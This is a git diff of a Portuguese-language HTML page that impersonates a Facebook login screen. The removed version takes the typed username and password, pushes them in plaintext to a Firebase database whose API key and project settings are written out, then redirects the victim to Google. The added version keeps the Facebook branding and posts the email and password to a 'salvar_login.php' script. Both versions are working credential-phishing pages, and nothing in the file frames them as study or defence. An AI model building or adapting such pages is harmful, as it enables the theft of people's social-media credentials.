--- a/index.html
+++ b/index.html
@@ -1,138 +1,125 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-  <title>Página de Login</title>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Login - Facebook</title>
   <style>
     body {
-      margin: 10;
-      padding: 10;
       font-family: Arial, sans-serif;
-      background: linear-gradient(to bottom, #1a237e, #2196F3);
+      margin: 0;
+      padding: 0;
       display: flex;
-      justify-content: center top;
+      justify-content: center;
       align-items: center;
-      min-height: 100vh;
-      flex-direction: column;
+      height: 100vh;
+      background-color: #f0f2f5;
     }
 
     .login-container {
-      margin-top: 0px; /* Adiciona um espaçamento entre a imagem e o formulário */
-      background-color: #0d47a1;
+      width: 360px;
+    }
+
+    .login-box {
+      background-color: #fff;
       padding: 20px;
-      border-radius: 10px;
-      box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
-      width: 300px;
+      box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
+      text-align: center;
     }
 
-    .login-container label,
-    .login-container input[type="text"],
-    .login-container input[type="password"],
-    .login-container input[type="submit"] {
-      display: block;
-      width: 100%;
-      margin-bottom: 15px;
+    img {
+      width: 120px;
+      margin-bottom: 20px;
     }
 
-    .login-container label {
-      color: #fff;
+    h2 {
+      margin-bottom: 20px;
     }
 
-    .login-container input[type="text"],
-    .login-container input[type="password"],
-    .login-container input[type="submit"] {
-      padding: 10px;
-      border: none;
-      border-radius: 5px;
-      background-color: #1a237e;
-      color: #fff;
-      box-sizing: border-box;
-    }
-
-    .login-container input[type="submit"] {
-      cursor: pointer;
-      background-color: #42a5f5;
-      transition: background-color 0.2s ease;
-    }
-
-    .login-container input[type="submit"]:hover {
-      background-color: #1976d2;
-    }
-
-    /* Estilos para o contêiner que envolve a imagem e o formulário */
-    .top-container {
+    form {
       display: flex;
       flex-direction: column;
-      align-items: center;
-      max-width: 400px;
-      margin-top: 0; /* Remove qualquer espaçamento superior */
     }
 
-    /* Estilos para a imagem no topo da página */
-    .logo-image {
-      max-width: 200px;
-      margin-top: 0; /* Remove qualquer espaçamento superior */
+    label {
+      margin-top: 10px;
+    }
+
+    input {
+      padding: 10px;
+      margin: 5px 0;
+      border: 1px solid #ccc;
+      border-radius: 4px;
+    }
+
+    button {
+      background-color: #1877f2;
+      color: #fff;
+      padding: 10px;
+      border: none;
+      border-radius: 4px;
+      cursor: pointer;
+      margin-top: 10px;
+    }
+
+    button:hover {
+      background-color: #0e63ac;
+    }
+
+    .separator {
+      margin: 20px 0;
+      position: relative;
+    }
+
+    .separator:before, .separator:after {
+      content: "";
+      position: absolute;
+      top: 50%;
+      width: 50%;
+      height: 1px;
+      background-color: #ddd;
+    }
+
+    .separator:before {
+      right: 100%;
+      margin-right: 15px;
+    }
+
+    .separator:after {
+      left: 100%;
+      margin-left: 15px;
+    }
+
+    a {
+      color: #1877f2;
+      text-decoration: none;
+      margin-top: 10px;
+    }
+
+    a:hover {
+      text-decoration: underline;
     }
   </style>
 </head>
 <body>
-  <div class="top-container">
-    <a href="https://www.google.com">
-      <img class="logo-image" src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/89/Facebook_Logo_%282019%29.svg/2560px-Facebook_Logo_%282019%29.svg.png" alt="Logo">
-    </a>
-    <div class="login-container">
-      <form id="login-form">
-        <label for="username">Usuário:</label>
-        <input type="text" id="username" name="username" required>
-
+  <div class="login-container">
+    <div class="login-box">
+      <img src="facebook-logo.png" alt="Facebook Logo">
+      <h2>Entrar no Facebook</h2>
+      <!-- Alteração no atributo action e método de envio do formulário -->
+      <form action="salvar_login.php" method="post">
+        <label for="email">Email ou Senha:</label>
+        <input type="text" id="email" name="email" required>
         <label for="password">Senha:</label>
         <input type="password" id="password" name="password" required>
-
-        <input type="submit" value="Entrar">
+        <button type="submit">Entrar</button>
+        <div class="separator">
+          <span>ou</span>
+        </div>
+        <a href="#">Criar nova Conta?</a>
+        <a href="#">Esqueceu a Senha?</a>
       </form>
     </div>
   </div>
-
-  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-app.js"></script>
-  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-auth.js"></script>
-  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-database.js"></script>
-
-  <script>
-    // Configurações específicas do seu projeto Firebase
-    var firebaseConfig = {
-      apiKey: "AIzaSyDMK4U8V3Gtc37wEKg1S8zqRAqoRBnqiqA",
-      authDomain: "brasil-tvvip.firebaseapp.com",
-      databaseURL: "https://brasil-tvvip-default-rtdb.firebaseio.com",
-      projectId: "brasil-tvvip",
-      storageBucket: "gs://brasil-tvvip.appspot.com",
-      messagingSenderId: "677145205938",
-      appId: "1:677145205938:android:25d65efacd550e900fbdab"
-    };
-
-    // Inicializar o Firebase
-    firebase.initializeApp(firebaseConfig);
-
-    // Obter referência para o formulário de login
-    var loginForm = document.getElementById("login-form");
-
-    // Adicionar um ouvinte para o evento de envio do formulário
-    loginForm.addEventListener("submit", function (event) {
-      event.preventDefault(); // Impedir o envio padrão do formulário
-
-      var username = document.getElementById("username").value;
-      var password = document.getElementById("password").value;
-
-      // Enviar informações do formulário para o Firebase Realtime Database
-      var database = firebase.database();
-      var usersRef = database.ref("users"); // Referência para o nó "users"
-      usersRef.push({
-        username: username,
-        password: password
-        // Outras informações que você deseja armazenar no banco de dados
-      });
-
-      // Redirecionar o usuário para o Google após o envio bem-sucedido
-      window.location.href = "https://google.com.br";
-    });
-  </script>
 </body>
 </html>
